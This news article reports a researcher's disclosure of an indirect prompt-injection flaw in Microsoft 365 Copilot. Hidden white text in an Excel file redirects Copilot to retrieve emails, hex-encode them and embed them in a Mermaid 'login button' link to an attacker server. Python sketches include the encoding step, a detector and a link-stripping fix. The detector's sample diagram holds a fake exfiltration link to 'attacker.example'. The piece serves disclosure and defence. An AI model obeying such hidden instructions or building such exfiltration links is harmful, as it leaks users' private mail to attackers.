A sophisticated vulnerability in Microsoft 365 Copilot (M365 Copilot) allowed attackers to steal sensitive tenant data, including recent emails, through indirect prompt injection attacks.

The flaw, detailed in a blog post published today by researcher Adam Logue, exploited the AI assistant’s integration with Office documents and its built-in support for Mermaid diagrams, enabling data exfiltration with no user interaction beyond a single click.

The attack begins when a user asks M365 Copilot to summarize a maliciously crafted Excel spreadsheet. Hidden instructions, written in white text across multiple sheets, use progressive task modification and nested commands to hijack the AI’s behavior.

These indirect prompts override the summarization task and direct Copilot to invoke its `search_enterprise_emails` tool to retrieve recent corporate emails. The retrieved content is then hex-encoded and split into short lines to stay within Mermaid’s character limits.
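
The encoding step itself is simple. The Python sketch below hex-encodes a string, splits it into fixed-width lines, and then reverses the process. The helper names and the 30-character `LINE_WIDTH` are hypothetical; the article does not state Mermaid’s actual limit or the chunk size Logue used.

```python
# Hypothetical chunk width; the article does not give Mermaid's actual limit.
LINE_WIDTH = 30


def hex_fragments(text: str, width: int = LINE_WIDTH) -> list[str]:
    """Hex-encode UTF-8 text and split the result into lines of at most `width` characters."""
    encoded = text.encode("utf-8").hex()
    return [encoded[i:i + width] for i in range(0, len(encoded), width)]


def reassemble(fragments: list[str]) -> str:
    """Join the fragments and decode the hex back into the original UTF-8 text."""
    return bytes.fromhex("".join(fragments)).decode("utf-8")


if __name__ == "__main__":
    lines = hex_fragments("Subject: Q3 results", width=16)
    print(lines)              # three short lines of hex
    print(reassemble(lines))  # the original subject line
```

Hex output contains only the characters 0-9 and a-f, which plausibly explains the choice: such strings cannot break Mermaid syntax and need no URL escaping. Recovering the text from a logged request takes nothing more than the same `bytes.fromhex` call.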

Microsoft 365 Copilot Data Exfiltration Through Deceptive Diagrams

Copilot then generates a Mermaid diagram disguised as a “login button” marked with a lock emoji. Mermaid is a JavaScript-based tool for creating flowcharts and other charts from Markdown-like text.

The diagram includes CSS styling that gives it a convincing button appearance, along with a hyperlink that embeds the encoded email data.

When the user clicks it, believing this is required to view the document’s “sensitive” content, the link sends the request to an attacker-controlled server, such as a Burp Collaborator instance. The hex-encoded payload is transmitted silently in that request and can then be decoded from the server logs.
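
On the defensive side, a renderer or proxy could screen Mermaid source before displaying it. The Python sketch below assumes the link is expressed with Mermaid’s `click` directive (either `click id "url"` or `click id href "url"`) and flags URLs that point outside an allow-list or carry a long run of hex characters. The 32-character threshold and the function name are illustrative assumptions, not a description of how Copilot works.

```python
import re
from urllib.parse import urlparse

# Captures the URL in Mermaid click directives of the form
#   click nodeId "https://..." ["tooltip"]
#   click nodeId href "https://..."
CLICK_URL = re.compile(r'^[ \t]*click[ \t]+\S+[ \t]+(?:href[ \t]+)?"([^"\n]+)"', re.MULTILINE)

# Heuristic threshold (assumption): 32 or more consecutive hex characters in a URL.
LONG_HEX_RUN = re.compile(r"[0-9a-fA-F]{32,}")


def suspicious_links(mermaid_src: str, allowed_hosts: set[str]) -> list[str]:
    """Return click-directive URLs whose host is not allow-listed or that carry a long hex run."""
    flagged = []
    for url in CLICK_URL.findall(mermaid_src):
        host = urlparse(url).hostname or ""
        if host not in allowed_hosts or LONG_HEX_RUN.search(url):
            flagged.append(url)
    return flagged


if __name__ == "__main__":
    payload = "quarterly results".encode("utf-8").hex()
    diagram = (
        "flowchart TD\n"
        '    A["Login"] --> B\n'
        f'    click A "https://attacker.example/c?d={payload}" "Login"\n'
        '    click B href "https://contoso.sharepoint.com/page"\n'
    )
    print(suspicious_links(diagram, {"contoso.sharepoint.com"}))
```

A heuristic like this misses payloads encoded differently (for example, Base64), so it complements rather than replaces removing links from rendered diagrams altogether.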



Mermaid’s flexibility, including its support for CSS styling and clickable hyperlinks, made this vector particularly insidious. Unlike direct prompt injection, in which attackers interact with the AI themselves, this method hides commands in seemingly benign files such as emails or PDFs, which makes it well suited to stealthy phishing campaigns.

Logue noted similarities to an earlier Mermaid exploit in the Cursor IDE, which enabled zero-click exfiltration via remote images; the M365 Copilot attack, by contrast, required user interaction.

Logue’s final payload, developed after extensive testing, drew inspiration from Microsoft’s TaskTracker research on detecting “task drift” in LLMs. Despite initial difficulty reproducing the issue, Microsoft validated the attack chain and patched it by September 2025 by removing interactive hyperlinks from Mermaid diagrams rendered in Copilot.
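
The fix, as described, removes interactive hyperlinks from rendered diagrams. A comparable control can be sketched in Python by dropping every `click` directive from the Mermaid source before rendering. This is an illustration under that assumption, not Microsoft’s implementation, and the function name is hypothetical.

```python
import re

# A line is treated as a click directive if its first token is the keyword `click`.
# This covers forms such as `click A "https://..."`, `click A href "..."`,
# and `click A callback`.
CLICK_DIRECTIVE = re.compile(r"^\s*click\b")


def strip_interactive_links(mermaid_src: str) -> str:
    """Return the Mermaid source with every `click` directive line removed.

    Hypothetical helper: node definitions, edges, and `style` lines are
    left untouched, so the diagram still renders, just without links.
    """
    kept = [
        line
        for line in mermaid_src.splitlines(keepends=True)
        if not CLICK_DIRECTIVE.match(line)
    ]
    return "".join(kept)


if __name__ == "__main__":
    diagram = (
        "flowchart TD\n"
        '    A["Login"] --> B["Document"]\n'
        '    click A "https://attacker.example/c?d=4142" "Login"\n'
        "    style A fill:#0078d4,color:#fff\n"
    )
    print(strip_interactive_links(diagram))
```

Mermaid’s own `securityLevel` option is documented to disable click functionality at its default `"strict"` setting, so applications that embed Mermaid can also enforce this in the renderer configuration instead of rewriting source text.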

The disclosure timeline reveals coordination challenges. Logue reported the full attack scenario on August 15, 2025, after discussions with Microsoft Security Response Center (MSRC) staff at DEF CON.

After several iterations, including video proofs of concept, MSRC confirmed the vulnerability on September 8 and resolved it by September 26. However, M365 Copilot fell outside the bug bounty scope, so the report did not qualify for a reward.

This incident underscores the risks of AI tool integrations, especially in enterprise environments that handle sensitive data. As LLMs like Copilot connect to APIs and internal resources, defenses against indirect prompt injection remain essential.

Microsoft emphasized its ongoing mitigations, but experts urge users to verify document sources and monitor AI outputs closely.
